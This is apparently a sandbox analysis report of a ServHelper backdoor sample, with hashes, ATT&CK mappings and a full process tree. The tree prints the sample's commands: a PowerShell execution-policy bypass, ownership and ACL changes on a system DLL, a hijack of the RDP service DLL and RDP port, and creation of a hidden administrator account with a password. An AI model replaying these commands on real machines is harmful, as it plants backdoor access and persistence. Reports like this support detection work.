servhelper | 282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8

Analysis

max time kernel
92s
max time network
128s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
10-04-2024 10:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe
Size

2.6MB
MD5

44e86870c9402d8246dc9498e448e890
SHA1

fa3a1b3b5c40927dd43e949783b9f1078122b1f7
SHA256

282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8
SHA512

5e459ef56d59be710e6b2464f7cbc8553f2f932fd499477829a4fe27a42ed1467331e4ea6eaee0dfeddf692ef0763e1035c8f9ab32e419cd9dec950d8f37cd0f
SSDEEP

49152:H/gy5fJnREzdOP+CtcMLq8t8eay0pSJA6Ecrk7Y2DPJ4VbQ/6ZgTQU1gCVrEWx1P:H/gy5hnrt92HRqxI7Y2F/zTyiwW3P

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001

Possible privilege escalation attempt 8 IoCs

exploit

pid	Process
4348	takeown.exe
3980	icacls.exe
4992	icacls.exe
2108	icacls.exe
4828	icacls.exe
4876	icacls.exe
3672	icacls.exe
2208	icacls.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation	282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe

Deletes itself 1 IoCs

pid	Process
4472	powershell.exe

Loads dropped DLL 12 IoCs

pid	Process
1604	282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe
1604	282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe
1604	282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe
1604	282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe
1604	282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe
1604	282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe
1604	282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe
1604	282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe
1604	282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe
1604	282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe
3628	Process not Found
3628	Process not Found

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
4828	icacls.exe
4876	icacls.exe
3672	icacls.exe
2208	icacls.exe
4348	takeown.exe
3980	icacls.exe
4992	icacls.exe
2108	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000700000002320d-76.dat	upx
behavioral2/files/0x0007000000023211-77.dat	upx

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Windows directory 8 IoCs

description	ioc	Process
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1836	timeout.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry

T1112

pid	Process
4104	reg.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
4472	powershell.exe
4472	powershell.exe
4472	powershell.exe
4472	powershell.exe
4472	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
660	Process not Found
660	Process not Found

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeRestorePrivilege	4992	icacls.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1604 wrote to memory of 5028	1604	282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe	97
PID 1604 wrote to memory of 5028	1604	282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe	97
PID 5028 wrote to memory of 1836	5028	cmd.exe	99
PID 5028 wrote to memory of 1836	5028	cmd.exe	99
PID 5028 wrote to memory of 4472	5028	cmd.exe	101
PID 5028 wrote to memory of 4472	5028	cmd.exe	101
PID 4472 wrote to memory of 4348	4472	powershell.exe	102
PID 4472 wrote to memory of 4348	4472	powershell.exe	102
PID 4472 wrote to memory of 3980	4472	powershell.exe	103
PID 4472 wrote to memory of 3980	4472	powershell.exe	103
PID 4472 wrote to memory of 4992	4472	powershell.exe	104
PID 4472 wrote to memory of 4992	4472	powershell.exe	104
PID 4472 wrote to memory of 2108	4472	powershell.exe	105
PID 4472 wrote to memory of 2108	4472	powershell.exe	105
PID 4472 wrote to memory of 4828	4472	powershell.exe	106
PID 4472 wrote to memory of 4828	4472	powershell.exe	106
PID 4472 wrote to memory of 4876	4472	powershell.exe	107
PID 4472 wrote to memory of 4876	4472	powershell.exe	107
PID 4472 wrote to memory of 3672	4472	powershell.exe	108
PID 4472 wrote to memory of 3672	4472	powershell.exe	108
PID 4472 wrote to memory of 2208	4472	powershell.exe	109
PID 4472 wrote to memory of 2208	4472	powershell.exe	109
PID 4472 wrote to memory of 412	4472	powershell.exe	110
PID 4472 wrote to memory of 412	4472	powershell.exe	110
PID 4472 wrote to memory of 4104	4472	powershell.exe	111
PID 4472 wrote to memory of 4104	4472	powershell.exe	111
PID 4472 wrote to memory of 3568	4472	powershell.exe	112
PID 4472 wrote to memory of 3568	4472	powershell.exe	112
PID 4472 wrote to memory of 232	4472	powershell.exe	113
PID 4472 wrote to memory of 232	4472	powershell.exe	113
PID 232 wrote to memory of 3396	232	net.exe	114
PID 232 wrote to memory of 3396	232	net.exe	114
PID 4472 wrote to memory of 3492	4472	powershell.exe	115
PID 4472 wrote to memory of 3492	4472	powershell.exe	115
PID 3492 wrote to memory of 2676	3492	cmd.exe	116
PID 3492 wrote to memory of 2676	3492	cmd.exe	116
PID 2676 wrote to memory of 5072	2676	cmd.exe	117
PID 2676 wrote to memory of 5072	2676	cmd.exe	117
PID 5072 wrote to memory of 3292	5072	net.exe	118
PID 5072 wrote to memory of 3292	5072	net.exe	118
PID 4472 wrote to memory of 4976	4472	powershell.exe	119
PID 4472 wrote to memory of 4976	4472	powershell.exe	119
PID 4976 wrote to memory of 4848	4976	cmd.exe	120
PID 4976 wrote to memory of 4848	4976	cmd.exe	120
PID 4848 wrote to memory of 316	4848	cmd.exe	121
PID 4848 wrote to memory of 316	4848	cmd.exe	121
PID 316 wrote to memory of 1892	316	net.exe	122
PID 316 wrote to memory of 1892	316	net.exe	122
PID 2168 wrote to memory of 4376	2168	cmd.exe	126
PID 2168 wrote to memory of 4376	2168	cmd.exe	126
PID 4376 wrote to memory of 4572	4376	net.exe	127
PID 4376 wrote to memory of 4572	4376	net.exe	127
PID 4792 wrote to memory of 4448	4792	cmd.exe	130
PID 4792 wrote to memory of 4448	4792	cmd.exe	130
PID 4448 wrote to memory of 1244	4448	net.exe	131
PID 4448 wrote to memory of 1244	4448	net.exe	131
PID 2772 wrote to memory of 3660	2772	cmd.exe	134
PID 2772 wrote to memory of 3660	2772	cmd.exe	134
PID 3660 wrote to memory of 1252	3660	net.exe	135
PID 3660 wrote to memory of 1252	3660	net.exe	135
PID 1908 wrote to memory of 632	1908	cmd.exe	138
PID 1908 wrote to memory of 632	1908	cmd.exe	138
PID 632 wrote to memory of 2744	632	net.exe	139
PID 632 wrote to memory of 2744	632	net.exe	139

C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe
"C:\Users\Admin\AppData\Local\Temp\282e8186cec5ec821d89c7347f508aca3eb1e5c532200d50550e75972e5c33c8.exe"
1⤵
- Checks computer location settings
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1604
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c timeout -t 15& powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\evil.ps1
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5028
- - C:\Windows\system32\timeout.exe
    timeout -t 15
    3⤵
    - Delays execution with timeout.exe
    PID:1836
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -f C:\Users\Admin\AppData\Local\Temp\evil.ps1
    3⤵
    - Deletes itself
    - Drops file in System32 directory
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4472
  - - C:\Windows\system32\takeown.exe
      "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4348
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3980
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      Suspicious use of AdjustPrivilegeToken
      PID:4992
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2108
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4828
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:4876
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:3672
  - - C:\Windows\system32\icacls.exe
      "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
      4⤵
      Possible privilege escalation attempt
      Modifies file permissions
      PID:2208
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      4⤵
      PID:412
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      4⤵
      Sets DLL path for service in the registry
      Modifies registry key
      PID:4104
  - - C:\Windows\system32\reg.exe
      "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
      4⤵
      PID:3568
  - - C:\Windows\system32\net.exe
      "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      4⤵
      Suspicious use of WriteProcessMemory
      PID:232
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        5⤵
        
        PID:3396
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3492
    - - C:\Windows\system32\cmd.exe
        
        cmd /c net start rdpdr
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2676
      - C:\Windows\system32\net.exe
        
        net start rdpdr
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:5072
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        7⤵
        
        PID:3292
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4976
    - - C:\Windows\system32\cmd.exe
        
        cmd /c net start TermService
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4848
      - C:\Windows\system32\net.exe
        
        net start TermService
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:316
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        7⤵
        
        PID:1892
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
      4⤵
      PID:4620
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
      4⤵
      PID:1656

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc Ghasar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc Ghasar4f5 /del
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4376
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del
    3⤵
    PID:4572

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc WqajC1V5 /add
1⤵
- Suspicious use of WriteProcessMemory
PID:4792
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc WqajC1V5 /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4448
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc WqajC1V5 /add
    3⤵
    PID:1244

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:2772
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3660
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    3⤵
    PID:1252

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" SLVJLBBW$ /ADD
1⤵
- Suspicious use of WriteProcessMemory
PID:1908
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" SLVJLBBW$ /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" SLVJLBBW$ /ADD
    3⤵
    PID:2744

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
1⤵
PID:2340
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  2⤵
  PID:1268
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
    3⤵
    PID:2160

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc WqajC1V5
1⤵
PID:1328
- C:\Windows\system32\net.exe
  net.exe user WgaUtilAcc WqajC1V5
  2⤵
  PID:2312
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user WgaUtilAcc WqajC1V5
    3⤵
    PID:3468

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0j5p2fet.otl.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\evil.ps1

Filesize
3.0MB

MD5
71378b4f0b781d534492988926cfb758

SHA1
db6c0e67a5b9a2932f071ee9e165658aa4950bf6

SHA256
1c88620ce8a15c57b1ca64da67cf995f1a3ce3aeef6087d90f6cff772fbf2614

SHA512
62f2475e7284ac7bf480edf5e60d6438e4aa4a8666a0d15694ba2e7ce7fb77629baed27c076f92720373251d97c6501a5ce21c91c7f0040d5fd4dfe92a9c45f4

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsg2F3F.tmp\System.dll

Filesize
11KB

MD5
fbe295e5a1acfbd0a6271898f885fe6a

SHA1
d6d205922e61635472efb13c2bb92c9ac6cb96da

SHA256
a1390a78533c47e55cc364e97af431117126d04a7faed49390210ea3e89dd0e1

SHA512
2cb596971e504eaf1ce8e3f09719ebfb3f6234cea5ca7b0d33ec7500832ff4b97ec2bbe15a1fbf7e6a5b02c59db824092b9562cd8991f4d027feab6fd3177b06

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsg2F3F.tmp\blowfish.dll

Filesize
22KB

MD5
5afd4a9b7e69e7c6e312b2ce4040394a

SHA1
fbd07adb3f02f866dc3a327a86b0f319d4a94502

SHA256
053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae

SHA512
f78efe9d1fa7d2ffc731d5f878f81e4dcbfaf0c561fdfbf4c133ba2ce1366c95c4672d67cae6a8bd8fcc7d04861a9da389d98361055ac46fc9793828d9776511

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsg2F3F.tmp\nsUnzip.dll

Filesize
146KB

MD5
77a26c23948070dc012bba65e7f390aa

SHA1
7e112775770f9b3b24e2a238b5f7c66f8802e5d8

SHA256
4e4e429ecf1c49119a21c817899f64152b03b41b036fc1d92aee335043364c43

SHA512
2e7ffa4ed5c97f555e1b0d6f55ffcfd53cd28302fc77d95fdaea89e0b6b42e67e366331e52358e78e8266d079cc2ca3ea4c909197fb38a5b4c8151c7678d0065

Download Submit
C:\Users\Admin\AppData\Local\Temp\uninst.dat.log

Filesize
102B

MD5
0a9acbe50c9af249014e877216e99f4c

SHA1
f79c9d8a1442634f130ffb5359e3502829c5b92f

SHA256
8183b668099930ea6f5bbdba89e67057499a28766cd61cf630642e0dfb4e4047

SHA512
8e79f88ae39e1f741eee33e9c2f0cc595b120a5260ba96790f5a6b90a4ce4dc5ff9e576e56708393c215fdd54964a04ee498795a482194b3c59800ea49925a33

Download Submit
C:\Windows\Branding\mediasrv.png

Filesize
54KB

MD5
34c833d9f05fa3ff36ad6256164f8510

SHA1
7f50ab402b023f751af95869d1c7789c864f77fb

SHA256
af2f4f3f3a34bfe56243b2419d0d494c48fbb38502395fc9a726f27737e6a178

SHA512
284edfce8fc6b9bfbe74b770492f8a592a284851d8fa59044147eea80aaaec35f29a4c90a39a1bca89e59f46bd943483b64eedd843a9e23533c82cd768205b93

Download Submit
C:\Windows\Branding\mediasvc.png

Filesize
945KB

MD5
d81ea89ae878fcfc33accae038a14016

SHA1
aafe059a73426ac3878724c9e713d58e8162ad3d

SHA256
978726f716f0b882d237e7120e0d6ae5ec69f0999e4dd5a5f24f152858d2ac00

SHA512
1568370943476b1bb1a45eb8631156bc53c973d77de2e560b1f66dd9223631d9504e6869e4311967a8aa87900b7bf0b39addc336ec02624403085991cec41d40

Download Submit
C:\Windows\system32\rfxvmt.dll

Filesize
40KB

MD5
dc39d23e4c0e681fad7a3e1342a2843c

SHA1
58fd7d50c2dca464a128f5e0435d6f0515e62073

SHA256
6d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9

SHA512
5cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7

Download Submit
memory/4472-56-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

Filesize
64KB

Download
memory/4472-55-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

Filesize
64KB

Download
memory/4472-72-0x00007FF97E210000-0x00007FF97ECD1000-memory.dmp

Filesize
10.8MB

Download
memory/4472-73-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

Filesize
64KB

Download
memory/4472-74-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

Filesize
64KB

Download
memory/4472-75-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

Filesize
64KB

Download
memory/4472-53-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

Filesize
64KB

Download
memory/4472-52-0x00000255F0FC0000-0x00000255F0FD0000-memory.dmp

Filesize
64KB

Download
memory/4472-51-0x00007FF97E210000-0x00007FF97ECD1000-memory.dmp

Filesize
10.8MB

Download
memory/4472-46-0x00000255F0F40000-0x00000255F0F62000-memory.dmp

Filesize
136KB

Download
memory/4472-83-0x00007FF97E210000-0x00007FF97ECD1000-memory.dmp

Filesize
10.8MB

Download